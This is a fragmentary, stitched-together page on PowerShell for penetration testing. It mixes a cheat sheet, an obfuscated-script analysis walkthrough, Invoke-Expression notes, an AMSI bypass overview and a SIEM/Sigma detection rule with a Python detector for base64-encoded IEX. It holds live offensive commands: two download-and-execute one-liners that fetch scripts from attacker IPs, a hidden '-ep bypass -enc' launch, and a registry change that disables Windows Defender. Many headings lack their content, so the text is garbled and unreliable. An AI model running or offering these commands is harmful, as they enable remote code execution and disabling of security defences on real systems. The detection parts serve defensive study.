Basic PS commands to start
#List everything loaded
#List everything containing “process”
#Get full help about a topic
#CREATE A CREDENTIAL OBJECT
Start-Process -Credential ($cred) -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:443/ipst.ps1')"
# Check Port or Single IP
# Check Port List in Single IP
# Check Port Range in single IP
# Check Port List in IP Lists – 80,443,445,8080
# Open SSH to the world
'SSH (Port 22)'
# Get name, proto, local and remote ports, remote address, enabled, profile and direction
In this part we will analyze the same obfuscated powershell code in another way. Here is the 1st and 2nd part:
Starting point of the obfuscated script
Ending point of the obfuscated script
iex means invoke-expression which is used to execute powershell command or script.
If we do not remove those pieces of code then code will look like this. See below:
Notice the iex at the end. This iex would then execute this 2nd layer obfuscated code in the memory.
We can see some variables.
Now we have saved the new layer of obfuscated code to a char.txt file on the desktop. Then we save char.txt again as char.ps1.
Then we open the char.ps1 file in the same way in PowerShell ISE and assign it to a variable $x.
Once it is executed in memory, we redirected the output into a charoutput.txt file in desktop.
The same encryption function that we saw in part 1.
Now this is one way to find out the encryption function. There is another way: we can use the PowerDecode PowerShell tool to uncover the obfuscation layer.
From the above link you can download the tool.
Now execute the script by running the .\GUI.ps1 command.
We will go for number 1 option
We will decode from single file
Now you need to provide the script that you want to decode or deobfuscate. Now it will ask you what would be your destination folder where this tool will save the decoded script. Please provide that folder. Then it will start removing obfuscation layer.
From the 1st layer of obfuscation we get another layer of obfuscated code. But I saw that the tool failed to decode the 2nd layer, which I did manually using CyberChef. Please check the part-1 writeup.
But thankfully the tool successfully decodes this part.
The main thing is, you need to know how to do it manually; then the tool will do the rest.
For your practice I am giving you another code. This tool will help you to decode this as well.
Thanks. I hope you learn something new from here.
Standard Aliases for Invoke-Expression:
Invoke-Expression accepts a string and treats it as PowerShell code, which allows the construction of dynamic code; this means that you have to be very careful about the string input.
You will have learned that PowerShell treats single and double quoted strings differently, with single quoted strings being interpreted literally; however, Invoke-Expression will strip the quotes completely, meaning this will work:
If the result of the expression is an empty array, invoke-expression will output
Some examples to demonstrate the difference between Invoke-Expression and Call:
So far so good, they both work and appear to do the same thing; now let's add a parameter to filter the results:
So using Call fails, but this is a good failure because we generally want to be specific about which command/cmdlet is being called and which parameters are being passed to it.
The correct way to do this with Call is passing the parameter as a separate string:
Examples
Create a variable named $MyExpr and use it to store the text of an expression, then use invoke-expression to actually run the expression:
The built-in help for has a bunch of other examples for running against multiple remote computers and using SSH.
“There are only two hard things in Computer Science: cache invalidation and naming things” ~ Phil Karlton
Related PowerShell Cmdlets
# Check status
#To completely disable Windows Defender on a computer, use the command:
New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
# Set exclusion path
# Check exclusions configured via GPO
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions
ValueName : Exclusions_Paths
ValueType : REG_DWORD
KeyName : Software\Policies\Microsoft\Windows Defender\Exclusions\Paths
ValueName : C:\Windows\Temp
ValueType : REG_SZ
amsi.dll is loaded into your process and has the necessary exports for any application to interact with. And because it's loaded into the memory space of a process you control, you can change its behaviour by overwriting instructions in memory, making it not detect anything.
Therefore, the goal of the AMSI bypasses you will see is to overwrite the instructions of that DLL in memory to make the detection useless.
AMSI bypass generator web page: https://amsi.fail/
# A Method
# Another: from https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method: from https://github.com/HernanRodriguez1/Bypass-AMSI
# Another Method
# AMSI Bypass in python
# Testing for Amsi Bypass:
AMSI Bypass 2 – Managed API Call Hooking
Check this post for detailed info and the code. Introduction:
This new technique relies upon API call hooking of .NET methods. As it turns out, .NET methods need to get compiled down to native machine instructions in memory, which end up looking very similar to native methods. These compiled methods can be hooked to change the control flow of a program.
The steps for performing API call hooking of .NET methods are:
AMSI Bypass 3 – SeDebug Privilege
AMSI Bypass – More Resources
Default PowerShell locations
This section defines which fields in matching raw events should be mapped to the incident attributes in the resulting incident.
The available raw event attributes to map are limited to the group by attributes and the aggregate event constraint fields for each subpattern
command = Filter.command,
hostName = Filter.hostName
Download & Execute
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
#host a text record with your payload at one of your (unburned) domains and do this:
Download & Execute in background with AMSI Bypass
Start-Process -NoNewWindow powershell “-nop -Windowstyle hidden -ep bypass -enc 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”
Using b64 from linux
Enable WinRM (Remote PS)
#This enables winrm
# Change NetWorkConnection Category to Private
Other connected drives
Detects usage of a base64 encoded "IEX" cmdlet in a process command line. This rule is adapted from https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml
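The rule above works because PowerShell's -EncodedCommand takes UTF-16LE text encoded as base64, and base64 spells the same token three different ways depending on its byte offset modulo 3. The following added example (not the Sigma project's code) derives those three spellings for IEX/iex/Invoke-Expression, matches them against constructed sample command lines, and decodes the -enc payload for analyst triage; the sample lines and helper names are constructed for this illustration.

```python
import base64
import re

# Tokens the Sigma rule hunts for once they are UTF-16LE + base64 encoded.
IEX_TOKENS = ("IEX", "iex", "Invoke-Expression")


def base64_variants(token: str) -> list[str]:
    """Return the three base64 spellings of a UTF-16LE token.

    Base64 consumes 3-byte groups, so a token encodes differently at each
    byte offset mod 3. Prepending 0, 1 or 2 NUL bytes reproduces each
    alignment; head/tail chars that depend on unknown neighbours are trimmed.
    """
    data = token.encode("utf-16-le")
    variants = []
    for pad in range(3):
        enc = base64.b64encode(b"\x00" * pad + data).decode("ascii")
        head = (0, 2, 3)[pad]                    # chars tainted by the NUL pad
        tail = (0, 3, 2)[(pad + len(data)) % 3]  # chars tainted by '=' padding
        variants.append(enc[head:len(enc) - tail])
    return variants


def detect_base64_iex(cmdline: str) -> list[str]:
    """Return the encoded IEX fragments present in a process command line."""
    return [v for t in IEX_TOKENS for v in base64_variants(t) if v in cmdline]


# -EncodedCommand may be abbreviated; its argument is base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Recover the plaintext script behind -enc <b64>, or None if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def encode_command(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines, not real telemetry.
SAMPLE_CMDLINES = [
    "powershell.exe -nop -w hidden -enc " + encode_command("IEX (Get-Date)"),
    "powershell.exe -enc " + encode_command("$s = 'Get-Date'; iex $s"),  # iex at offset 1 mod 3
    "powershell.exe -enc " + encode_command("Get-Process | Sort-Object CPU"),
    "powershell.exe -Command Get-Service",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(detect_base64_iex(line) or "clean", "|", decode_encoded_command(line))
```

Generating the variants from the token, rather than hard-coding them, is what makes the detector cover all three alignments and extends directly to other cmdlet names you want to watch.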
Password from secure string
#List only “Security Update” patches
Time Window
Command and Scripting Interpreter: PowerShell
Adversaries may abuse PowerShell commands and scripts for execution. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code.
Data Source
Windows Sysmon via FortiSIEM Agent
Converting the SDDL String into a Readable Format
Options : CreationTime, CreationTimeUtc, LastAccessTime, LastAccessTimeUtc, LastWriteTime, LastWriteTimeUtc
Remediation Guidance
No remediation guidance specified
Secure String to Plaintext
Password : 1ts
SecurePassword : System.Security.SecureString
Domain : HTB
Or directly parsing from XML:
MITRE ATT&CK® Tactics
Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.
SubPattern Definitions
This is the named definition of the event query; it matters when multiple subpatterns are defined, so they can be distinguished.
SubPattern Query
This is the query logic that matches incoming events.
Group by Attributes
This defines how matching events are aggregated; only events with the same matching attribute values are grouped into one unique incident ID.
Aggregate Constraint
This is most typically a numerical constraint that defines when the rule should trigger an incident.